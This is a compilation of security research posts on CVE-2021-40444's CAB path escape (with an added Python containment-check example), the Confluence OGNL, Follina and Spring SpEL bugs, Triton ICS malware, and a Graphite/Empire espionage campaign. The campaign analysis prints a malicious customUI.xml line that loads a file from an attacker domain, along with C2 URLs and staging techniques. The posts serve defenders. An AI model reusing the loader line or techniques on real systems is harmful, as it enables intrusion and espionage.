HTML code is processed in **mshtml.dll**, while the HTTP protocol and MSHTML downloads are verified for trust and handled in urlmon.dll. The design flaw in the **urlmon.dll** code was in the extraction and trust verification of the downloaded CAB file. The CAB file was downloaded via JavaScript (JS) code embedded within the **side.html** page, as in figure 11 above. Because of the missing path escape checks during the extraction of the CAB file, the exploit was able to extract the file contained within the CAB to the relative path shown in figure 12 below. This resulted in the malicious payload being dropped outside of the created TEMP directory, eventually allowing the dropped payload to be executed.

**Figure 12 – Vulnerability in CAB file extraction function in urlmon.dll**

##### Conclusion

There has been a trend in the past few years of vulnerabilities like CVE-2021-44228, CVE-2021-34527, CVE-2021-36942 and CVE-2021-40444, described above, which take advantage of inherent processing flaws and are predominantly feature abuse. While memory corruption flaws will continue to proliferate as long as insecure code exists in languages that are not memory safe, unlike Rust, we certainly expect to see the exploitation trend moving more towards exploiting design or logic flaws and protocol abuses.
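The missing path escape check from the CVE-2021-40444 CAB extraction passage above, as an added example in Python (not urlmon.dll code): every member name an archive supplies is normalised and resolved against the extraction directory, and anything that would land outside that directory is refused. The member names, the extraction directory and the `resolve_member` and `audit` helpers are constructed for this example.

```python
"""
Added example (not urlmon.dll code): containment check for archive member names
before extraction, rejecting names that escape the extraction directory.
"""
import os
import posixpath
from typing import List, Tuple


def resolve_member(extract_dir: str, member_name: str) -> Tuple[bool, str]:
    """Return (allowed, resolved_path). Rejects absolute names, drive-letter names
    and any '..' sequence that climbs above extract_dir. Both '/' and '\\' are
    accepted as separators, since CAB/zip producers may use either."""
    name = member_name.replace("\\", "/")
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return False, ""                      # absolute or drive-relative path
    norm = posixpath.normpath(name)           # collapses 'a/../b' to 'b', keeps leading '..'
    if norm == "." or norm == ".." or norm.startswith("../"):
        return False, ""                      # empty name or escapes the extraction root
    base = os.path.abspath(extract_dir)
    target = os.path.abspath(os.path.join(base, *norm.split("/")))
    if os.path.commonpath([base, target]) != base:
        return False, ""                      # belt and braces after OS-level normalisation
    return True, target


# Constructed member names of the kind an extraction routine might be handed.
CONSTRUCTED_MEMBERS = [
    "installer.inf",        # ordinary name, stays inside the directory
    "../dropped.inf",       # climbs one level above the extraction directory
    "..\\..\\dropped.dll",  # backslash separators, climbs two levels
    "sub/../ok.txt",        # contains '..' but resolves inside the directory
    "/etc/passwd",          # absolute path
]


def audit(extract_dir: str, members: List[str]) -> List[Tuple[str, bool]]:
    """Decide, for each member name, whether extraction into extract_dir is allowed."""
    return [(m, resolve_member(extract_dir, m)[0]) for m in members]


if __name__ == "__main__":
    for name, ok in audit("/tmp/cab_extract_example", CONSTRUCTED_MEMBERS):
        print(f"{'allow ' if ok else 'reject'} {name!r}")
```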
Consumers as well as developers of open source software need to be more vigilant, as these flaws will allow adversaries to achieve their initial system-level objective of moving laterally within the network without worrying about the defense in depth of recently matured memory exploit mitigations.

Source record: type trellix; id TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C; published 2022-01-24; title "Beyond Memory Corruption Vulnerabilities – A Security Extinction and Future of Exploitation"; CVEs: CVE-2021-34527, CVE-2021-36942, CVE-2021-40444, CVE-2021-44228; href: https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/beyond-memory-corruption-vulnerabilities.html

Source record: lastseen 2022-07-06

# The Bug Report – June 2022 Edition

By Sam Quinn · July 6, 2022

## Your Cybersecurity Comic Relief

### Why am I here?

Why do all the most critical vulnerabilities always have to come out on holidays? Just like clockwork, CVE-2022-26134 came out over the U.S. Memorial Day weekend, as most of us were trying to get away from technology for a change. Bugs like this always bring us back early. But enough complaining about ruined vacations; let's get into the worst (and coolest) bugs of this month! The winners are:

* CVE-2022-26134 - OGNL injection vulnerability in Atlassian Confluence
* CVE-2022-30190 - Zero-click Microsoft Support Diagnostic Tool vulnerability: "Follina"
* CVE-2022-22980 – SpEL injection via parameter placeholder expressions

## CVE-2022-26134: ${ return this.JavaVuln++; }

### What is it?

At its core, CVE-2022-26134 is an unauthenticated command injection directly into a Java interpreter. More specifically, this vulnerability is through Java's Object-Graph Navigation Language (OGNL) expression language. While most bugs require lengthy explanations and technical walk-throughs, this vulnerability is more easily understood by looking at the exploitation payload first.

Figure 1: Demonstration of CVE-2022-26134 using cURL (encoded)

For those that cannot read ASCII hex fluently:

Figure 2: Demonstration of CVE-2022-26134 using cURL (decoded to ASCII)

See!? The exploit request is easier than knowing what OGNL is.

But we must give nerds like myself some technical satisfaction on how this bug works and why it is so simple. In short, the user-supplied URI eventually trickles down to an OGNL expression evaluator, which attempts to resolve any variables in the URI, which in turn can be used to execute Java code.

It is important to also point out that this vulnerability is unauthenticated and will execute with the privileges of the Confluence server... which is definitely not root, right?

### Who cares?

Because this is such a simple vulnerability to exploit, there are already a huge number of POCs available on the web. Heck, there is even one in this report. This vulnerability has been and will be actively used in the wild, and Confluence still uses the arcane method of manual updates (yuck)! So, with many unpatched systems still out in the wild, I expect to see exploit attempts targeting CVE-2022-26134 long into the future.

From a quick Shodan search there are about 13k publicly available Confluence servers, and with many Confluence users being businesses, the impact of this vulnerability is nothing to shake a stick at.

Figure 3: Shodan.io search results for Confluence servers

### What can I do?

Patching is your best defense and details are available [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). If a full Confluence server update is out of the question, you can manually patch the vulnerable ".jar" files by downloading them [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html#migration>) and overwriting them in the Confluence install directory. But please, if you are going to be overwriting install files, have a backup. If you don't even know where your Confluence server is, flagging/blocking any URI that contains the characters "${" may also prove useful. As a Trellix customer you're already protected, as we already have multiple network signatures baked into our [Network Security Platform](<https://www.trellix.com/en-us/platform/network-security.html>).

## CVE-2022-30190: Shoot! There is trouble in Microsoft Office's troubleshooter

### What is it?

CVE-2022-30190, nicknamed "Follina," was first discovered in the wild from an upload to [VirusTotal](<https://www.virustotal.com/>). Through this VirusTotal upload, combined with the Twitter post shown below, the world was made aware of this true zero-day.

[Figure 4: MSDT troubleshooter argument command injection](<https://twitter.com/nao_sec/status/1530196847679401984?s=20&t=5zDh7mYs2azLWJ-X55h70g>)

By using Microsoft Word's remote template functionality, a maliciously crafted document can be used to resolve the "ms-msdt:/" portion of the remote URL via a Windows custom protocol handler. After it is resolved, the URL is passed directly to the Microsoft Support Diagnostic Tool (msdt.exe). The vulnerability lies within the MSDT tool's "IT_BrowseForFile" argument as it is parsed by PowerShell.
This means that anything you could normally do via PowerShell could also take place via this bug through the “IT-BrowseForFile” parameter.

### Who cares?

In short, this vulnerability affects all versions of Office 365 and has been shown to also work in the standalone Office suites from 2013 all the way through Office 2021, even with macros disabled! It has been determined that Office “protected view” will prevent the Follina vulnerability unless the document has been converted to a Rich Text Format (RTF) document. So, still be wary of unknown files until you are fully patched.

It is worth mentioning that this was a true zero-day and active exploitation has been observed in the wild, with many ransomware gangs trying to use this vulnerability for a quick win. Obviously Trellix is actively watching this bug and more information can be found [here](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/follina-microsoft-office-zero-day-cve-2022-30190.html>).

### What can I do?

The best plan of action to protect against this attack in your environment is to apply the official patch released by Microsoft [here](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>). Can't patch? Trellix has your back with protection built into our products! Check out this [knowledge base article](<https://kcm.trellix.com/agent/index?page=content&id=KB95707&locale=en_US>) for more details. Lastly, if all else fails, following this official workaround will protect against the Follina bug:

 1. Run Command Prompt as Administrator.
 2. To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”.
 3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.

The workaround above will prevent the resolution of any “ms-msdt:/” URLs.

## CVE-2022-22980: Spring4shell resurrected?

### What is it?

CVE-2022-22980 is the latest vulnerability in the Spring framework, eerily similar to the Spring4Shell vulnerabilities publicly [released early this year](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-bug-report-april-2022-edition.html#CVE-2022-22965>). This vulnerability, just like Spring4Shell, takes advantage of Spring Expression Language (SpEL) injection to execute code on the remote host. The abused SpEL functions for this vulnerability are the “@Query” and “@Aggregation”-annotated query methods. These methods are only vulnerable when user-supplied data is not sanitized before being bound via query parameter placeholders. For the SpEL laypersons out there (myself included), the query parameter placeholders are presented this way, “o.owner.id = ?#{ some-expression }”, instead of a static parameter accessed in this manner, “o.owner.id = [1]”. More details on parameter placeholder expressions can be seen [here](<https://github.com/spring-projects/spring-data-jpa/issues/955>). So, how is it exploited, you may be wondering? Well, if a placeholder consumes user input directly without sanitization, this bug could be exploited by passing in Java code directly, as shown in the PoC below.

[Figure 5: Proof of concept exploit opening calculator for CVE-2022-22980](<https://github.com/trganda/CVE-2022-22980>)

### Who cares?

If you were affected by the Spring4Shell vulnerabilities earlier this year, then you probably should care about this CVE as well.
It seems like finding all the Java machines to patch is starting to become a monthly ritual.

More specifically, if you are running an application that utilizes Spring Data MongoDB V3.4.0 or V3.3.0-V3.3.4, you are likely vulnerable.

### What can I do?

Not to beat a dead horse, but the first step would be to patch to the latest version of Spring Data MongoDB, either 3.4.1+ or 3.3.5+. If patching is not a viable solution in your environment, one could secure themselves by using static parameter references “[1]” instead of “?1” and sanitizing user-supplied input before the query method. The last mitigation would be to “Reconfigure the repository factory bean through a BeanPostProcessor with a limited QueryMethodEvaluationContextProvider”. While the last mitigation was pulled directly from [VMware's security disclosure page](<https://tanzu.vmware.com/security/cve-2022-22980>) and I am sure it will mean something to someone, I do not know what a “factory bean” is. Sounds tasty though.

Source: https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-june-2022-edition.html (published 2022-07-06)

# Triton Malware Spearheads Latest Attacks on Industrial Systems | McAfee Blogs

Thomas Roccia · NOV 08, 2018

Malware that attacks industrial control systems (ICS), such as the [Stuxnet campaign](<https://www.mcafee.com/enterprise/en-us/security-awareness/what-is-stuxnet.html>) in 2010, is a serious threat.
This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.

ICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as by political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.

In August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware—dubbed Triton, Trisis, or HatMan—attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.

After gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an [accidental shutdown](<https://www.darkreading.com/attacks-breaches/triton-attacker-disrupts-ics-operations-while-botching-attempt-to-cause-physical-damage-/d/d-id/1330650>) of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcode; they completely controlled the target.
However, because the attack did not succeed, it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.

### History of ICS malware

In 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take control of the industrial process.

In 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.

BlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.

In 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet’s. It is unclear if this was a proof of concept or a simple penetration-testing tool.

Industroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of service module. It was crafted for destruction. The attack caused a second shutdown of Ukraine’s power grid.

In 2017, Triton was discovered. The attack did not succeed; had it, the consequences could have been disastrous.

ICS malware is critical because it infects industrial devices and automation. However, regular malware can also impact industrial processes. Last year WannaCry forced several companies, from medical to automobile industries, to stop production.
Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.

Facing widespread risks, critical infrastructures need a specific approach to stay safe.

### Triton framework

Triton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.

The attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.

To communicate with SIS controllers, the attackers recoded the proprietary TriStation communication protocol, which runs on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.

Nozomi Networks has created a [Wireshark dissector](<https://github.com/NozomiNetworks/tricotools>) that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS.
Triton requires the “running state” of the controller to perform the next stages of the attack.

In the preceding screen Triconex replies to the request “Get Control Program Status,” which is sent by Triton.

The Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a Python script compiled into an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the Python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.

The following schema shows the main modules of Triton:

The missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.

### How to detect an unusual network connection

[Nozomi Networks has created a script](<https://github.com/NozomiNetworks/tricotools>) that simulates a Triconex safety controller. We modified this script to run on a Raspberry Pi and create a cheap detector tool.

This inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and a siren. It also displays the IP address of the connection for further investigation.

The following picture shows how to connect the LED and buzzer.

### Fighting ICS malware

ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton.
ICSs are now exposed to connected environments they were not designed for.

Standard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.

Further security recommendations:

 * Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and two-factor authentication, card readers, surveillance cameras, etc.
 * Use a DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network
 * Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges
 * Log and monitor every action on the ICS network to quickly identify a point of failure
 * When possible, implement redundancy on critical devices to avoid major issues
 * Develop strong security policies and an incident response plan to restore systems during an incident
 * Train people with simulated incident responses and security awareness

Attackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected.
Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.

### Indicators of compromise

### References

 * <https://blog.schneider-electric.com/cyber-security/2018/08/07/one-year-after-triton-building-ongoing-industry-wide-cyber-resilience/>
 * <https://www.youtube.com/watch?v=f09E75bWvkk>
 * <https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf>
 * <https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html>
 * <https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware>
 * <https://www.nozominetworks.com/2018/07/18/blog/new-triton-analysis-tool-wireshark-dissector-for-tristation-protocol/>
 * <https://github.com/NozomiNetworks/tricotools>
 * <https://cyberx-labs.com/en/blog/triton-post-mortem-analysis-latest-ot-attack-framework/>
 * <https://vimeo.com/275906105>
 * <https://vimeo.com/248057640>
 * <https://blog.talosintelligence.com/2017/07/template-injection.html>
 * <https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN>

Source: https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/triton-malware-spearheads-latest-generation-of-attacks-on-industrial-systems.html (published 2018-11-08)

# Prime Minister’s Office Compromised: Details of Recent Espionage Campaign

By Marc Elias · January 25, 2022

A special thanks to Christiaan Beek, Alexandre Mundo, Leandro Velasco and Max Kersten for malware analysis and support during this investigation.

#### Executive Summary

Our Advanced Threat Research Team has identified a multi-stage espionage campaign targeting high-ranking government officials in Western Asia and Eastern Europe. As we detail the technical components of this attack, we can confirm that we have undertaken pre-release disclosure to the victims and provided all necessary content required to remove all known attack components from their environments.

The infection chain starts with the execution of an Excel downloader, most likely sent to the victim via email, which exploits an MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) to execute a malicious executable in memory.
The attack uses a follow-up piece of malware called Graphite because it uses Microsoft’s Graph API to leverage OneDrive as a command and control server—a technique our team has not seen before. Furthermore, the attack was split into multiple stages to stay as hidden as possible.

Command and control functions used an Empire server that was prepared in July 2021, and the actual campaign was active from October to November 2021. The blog below will explain the inner workings, victimology, infrastructure and timeline of the attack and, of course, reveal the IOCs and MITRE ATT&CK techniques.

A number of the attack indicators and apparent geopolitical objectives resemble those associated with the previously uncovered threat actor APT28. While we don’t believe in attributing any campaign solely based on such evidence, we have a moderate level of confidence that our assumption is accurate. That said, we are supremely confident that we are dealing with a very skilled actor based on how the infrastructure, malware coding and operation were set up.

Trellix customers are protected by the different McAfee Enterprise and FireEye products that were provided with these indicators.

#### Analysis of the Attack Process

This section provides an analysis of the overall process of the attack, beginning with the execution of an Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)). This is used to execute a malicious DLL file acting as a downloader for the third stage malware we called Graphite. Graphite is a newly discovered malware sample based on a OneDrive Empire Stager which leverages OneDrive accounts as a command and control server via the Microsoft Graph API.
The last phases of this multi-stage attack, which we believe is associated with an APT operation, include the execution of different Empire stagers to finally download an Empire agent on victims’ computers and engage the command and control server to remotely control the systems.

The following diagram shows the overall process of this attack.

**Figure 1. Attack flow**

#### First Stage – Excel Downloaders

As suggested, the first stage of the attack likely uses a spear phishing email to lure victims into opening an Excel file, which goes by the name “parliament_rew.xlsx”. Below you can see the identifying information for this file:

File type | Excel Microsoft Office Open XML Format document
---|---
File name | parliament_rew.xlsx
File size | 19.26 KB
Compilation time | 05/10/2021
MD5 | 8e2f8c95b1919651fcac7293cb704c1c
SHA-256 | f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4

**Figure 2. Decoy text observed in the Excel file**

In analyzing this file’s structure, we observed that it includes a folder named “customUI” that contains a file named “customUI.xml”. Opening this file with a text editor, we observed that the malicious document uses the “CustomUI.OnLoad” property of the OpenXML format to load an external file from a remote server:

```xml
<customUI xmlns="http://schemas.microsoft.com/office/2006/01/customui" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>
```

This technique allows the attackers to bypass some antivirus scanning engines and office analysis tools, decreasing the chances of the documents being detected.

The downloaded file is again an Excel spreadsheet, but this time it is saved using the old Microsoft Office Excel 97-2003 Binary File Format (.xls).
Below you can see the identifying information of the file:

File type | Microsoft Office Excel 97-2003 Binary File Format
---|---
File name | parliament_rew.xls
File size | 20.00 KB
Compilation time | 05/10/2021
MD5 | abd182f7f7b36e9a1ea9ac210d1899df
SHA-256 | 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a

Analyzing the metadata objects, we can identify that the creator was using code page 1252, used in Western European countries, and that the file was created on October 5th, 2021.

**Figure 3. Document metadata**

Later, we analyzed the OLE objects in the document and discovered a Linked Object OLEStream structure which contains a link to the exploit for the CVE-2021-40444 vulnerability hosted on the attackers’ server. This allows the document to automatically download the HTML file and subsequently call the Internet Explorer engine to interpret it, triggering the execution of the exploit.

**Figure 4. Remote link in OLE object**

In this blog post we won’t examine the internals of the CVE-2021-40444 vulnerability as it has already been publicly explained and discussed. Instead, we will continue the analysis on the second stage DLL contained in the CAB file of the exploit.

#### Second Stage – DLL Downloader

The second stage is a DLL executable named fontsubc.dll which was extracted from the CAB file used in the exploit mentioned before. You can see the identifying information of the file below:

File type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
---|---
File name | fontsubc.dll
File size | 88.50 KB
Compilation time | 28/09/2021
MD5 | 81de02d6e6fca8e16f2914ebd2176b78
SHA-256 | 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40

This file exports a function called “CPlApplet” that Windows recognizes as a control panel application.
Primarily, this acts as a downloader for the next stage malware, which is located at hxxps://wordkeyvpload[.]net/keys/update[.]dat, using COM objects and the API “URLOpenBlockingStreamW”.

**Figure 5. Download of next stage malware**

After downloading the file, the malware will decrypt it with an embedded RSA public key and check its integrity by calculating a SHA-256 of the decrypted payload. Lastly, the malware will allocate virtual memory, copy the payload to it and execute it.

**Figure 6. Payload decryption and execution**

Before executing the downloaded payload, the malware will compare the first four bytes with the magic value DE 47 AC 45 in hexadecimal; if they are different, it won’t execute the payload.

**Figure 7. Malware magic value**

#### Third Stage – Graphite Malware

The third stage is a DLL executable, never written to disk, named dfsvc.dll that we were able to extract from the memory of the previous stage. Below you can see the identifying information of the file:

File type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
---|---
File name | dfsvc.dll
File size | 24.00 KB
Compilation time | 20/09/2021
MD5 | 0ff09c344fc672880fdb03d429c7bda4
SHA-256 | f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231

We named this malware Graphite due to its use of the Microsoft Graph API to use OneDrive as command and control. It is very likely that the developers of Graphite used the Empire OneDrive Stager as a reference, due to the similarities in functionality and in the file structure used in the OneDrive account of the actors.

**Figure 8. Empire OneDrive stager API requests**

Graphite starts by creating a mutex with the hardcoded name “250gHJAWUI289382s3h3Uasuh289di” to avoid double execution, decrypting its strings and dynamically resolving the APIs it will use later.
Moreover, it will calculate a bot identifier to identify the infected computer, which is a CRC32 checksum of the value stored in the registry key “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid”.

**Figure 9. Graphite initializations**

Next, the malware will create a thread to monitor the execution of tasks and upload their results to the OneDrive account. Result files will be uploaded to the “update” folder of the attackers’ OneDrive account.

**Figure 10. Thread to monitor task results**

After that, the malware will enter an infinite loop where every 20 minutes it will obtain a new OAuth2 token to use with the Microsoft Graph API requests and determine if there are new tasks to execute in the “check” folder of the attackers’ OneDrive account.

**Figure 11. Request of new OAuth2 token**

Once it has obtained a valid OAuth2 token, reconnaissance data is gathered containing the following information from the victims’ systems:

 * Running processes
 * .NET CLR version from PowerShell
 * Windows OS version

The data is compressed using the LZNT1 algorithm and encrypted with a hardcoded AES-256-CBC key with a random IV. The operator tasks are encoded in the same way. Finally, the file containing the system information is uploaded to the folder “{BOT_ID}/update” in OneDrive with a random name.

**Figure 12. Graphite encoding data**

Graphite will also query for new commands by enumerating the child files in the "check" subdirectory. If a new file is found, it will use the Graph API to download the content of the file and decrypt it. The decrypted tasks have two fields; the first one is a unique identifier of the task and the second one specifies the command to execute.

The command value “1” will instruct the malware to send the system information to the command and control again, which is the attackers’ OneDrive.
The command value “2” indicates that the decrypted task is a shellcode, and the malware will create a thread to execute it.

**Figure 13. Graphite commands**

If the received task is a shellcode, it will check the third field against the magic value DE 47 AC 45 in hexadecimal and, if they are different, it won’t execute the payload. The rest of the bytes of the task are the shellcode that will be executed. Lastly, the task files are deleted from the OneDrive after being processed.

**Figure 14. Decrypted operator task**

The diagram below summarizes the flow of the Graphite malware.

**Figure 15. Graphite execution diagram**

#### Fourth Stage – Empire DLL Launcher Stager

The fourth stage is a dynamic library file named csiresources.dll that we were able to extract from a task from the previous stage. The file was embedded into a Graphite shellcode task used to reflectively load the executable into the memory of the process and execute it. Below you can see the identifying information of the file:

File type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
---|---
File name | csiresources.dll
File size | 111.00 KB
Compilation time | 21/09/2021
MD5 | 138122869fb47e3c1a0dfe66d4736f9b
SHA-256 | 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9

The sample is a generated Empire DLL Launcher stager that will initialize and start the .NET CLR runtime inside an unmanaged process to execute a download cradle that stages an Empire agent. With that, it is possible to run the Empire agent in a process that’s not PowerShell.exe.

First, the malware will check whether it is executing from the explorer.exe process. If it is not, the malware will exit.

**Figure 16. Process name check**

Next, the malware will try to find the file “EhStorShell.dll” in the System32 folder and load it.
With this, the malware makes sure that the original “EhStorShell.dll” file is loaded into the explorer.exe context.

**Figure 17. Loading EhStorShell.dll library**

The previous operation is important because the follow-up malware will override the CLSID “{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}” to gain persistence on the victims’ system, performing a COM hijacking technique. The aforementioned CLSID corresponds to the “Enhanced Storage Shell Extension DLL” and is handled by the file “EhStorShell.dll”.

Coming up next, the malware will load, initialize and start the .NET CLR runtime, XOR decrypt the .NET next stage payload and load it into memory. Lastly, it will execute the file using the .NET runtime.

**Figure 18. Decryption of next stage malware**

#### Fifth Stage – Empire PowerShell C# Stager

The fifth stage is a .NET executable named Service.exe which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:

File type | PE32 executable for MS Windows (console) Intel 80386 32-bit
---|---
File size | 34.00 KB
MD5 | 3b27fe7b346e3dabd08e618c9674e007
SHA-256 | d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317

This sample is an Empire PowerShell C# Stager whose main goal is to create an instance of a PowerShell object, decrypt the embedded PowerShell script using XOR operations and decode it with Base64 before finally executing the payload with the Invoke function.

**Figure 19. Fifth stage code**

The reason behind using a .NET executable to load and execute PowerShell code is to bypass security measures like AMSI, allowing execution from a process that shouldn’t allow it.

#### Sixth Stage – Empire HTTP PowerShell Stager

The last stage is a PowerShell script, specifically an Empire HTTP Stager, which was embedded and encrypted in the previous stage.
Below you can see the identifying information of the file:

File type | PowerShell script
---|---
File size | 6.00 KB
MD5 | a81fab5cf0c2a1c66e50184c38283e0e
SHA-256 | da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37

As we mentioned earlier, this is the last stage of the multi-stage attack and is an HTTP stager heavily obfuscated using the Invoke-Obfuscation script from Empire to make analysis difficult.

**Figure 20. Obfuscated PowerShell script**

The main functionality of the script is to contact hxxp://wordkeyvpload[.]org/index[.]jsp to send the initial information about the system and connect to the URL hxxp://wordkeyvpload[.]org/index[.]php to download the encrypted Empire agent, decrypt it with AES-256 and execute it.

#### Timeline of Events

Based on all the activities monitored and analyzed, we provide the following timeline of events:

**Figure 21. Timeline of the campaign**

#### Targeting

One of the lure documents we mentioned before (named “parliament_rew.xlsx”) might have been aimed at government employees.

Besides targeting government entities, it appears this adversary also has its sights on the defense industry. Another document with the name “Missions Budget.xlsx” contained the text “Military and civilian missions and operations” and the budgets in dollars for the military operations in some countries for the years 2022 and 2023.

**Figure 22. Lure document targeting the defense sector**

Moreover, from our telemetry we have also observed that Poland and other Eastern European countries were of interest to the actors behind this campaign.

The complete victimology of the actors is unknown, but the lure documents we have seen show that their activities are centered on specific regions and industries.
Based on the names and content of the malicious Excel files and on our telemetry, the targeting covers countries in Western Asia and Eastern Europe, and the most prevalent industries are defense and government.\n\n#### Infrastructure\n\nThanks to the analysis of the full attack chain, two hosts related to the attack were identified. The first domain is wordkeyvpload.net, which resolves to the IP 131.153.96.114, located in Serbia and registered on the 7th of July 2021 with OwnRegistrar Inc. \n\nQuerying the IP with a reverse DNS lookup tool returned a PTR record pointing to the domain \u201cbwh7196.bitcoinwebhosting.net\u201d, which could indicate that the server was bought from the Bitcoin Web Hosting VPS reseller.\n\n **Figure 23. Reverse DNS query**\n\nThe main functionality of this command-and-control server is to host the HTML exploit for CVE-2021-40444 and the CAB file containing the second-stage DLL.\n\nThe second domain identified is wordkeyvpload.org, which resolves to the IP 185.117.88.19, located in Sweden, and was registered on the 18th of June 2021 with Namecheap Inc. Based on the operating system (Microsoft Windows Server 2008 R2), the HTTP server banner (Microsoft-IIS/7.5) and the open ports (1337 and 5000), it is very likely that the host is running the Empire post-exploitation framework.\n\nThe reason behind that hypothesis is that the default configuration of an Empire server exposes a RESTful API on port 1337 and a SocketIO interface on port 5000 for interacting remotely with the server. Also, when deploying an HTTP listener, the default value of its Server header field is \u201cMicrosoft-IIS/7.5\u201d. The banner on its own is a weak signal, since IIS 7.5 is the version that genuinely ships with Windows Server 2008 R2; the 1337/5000 port pair is the more distinctive indicator.\n\n **Figure 24. 
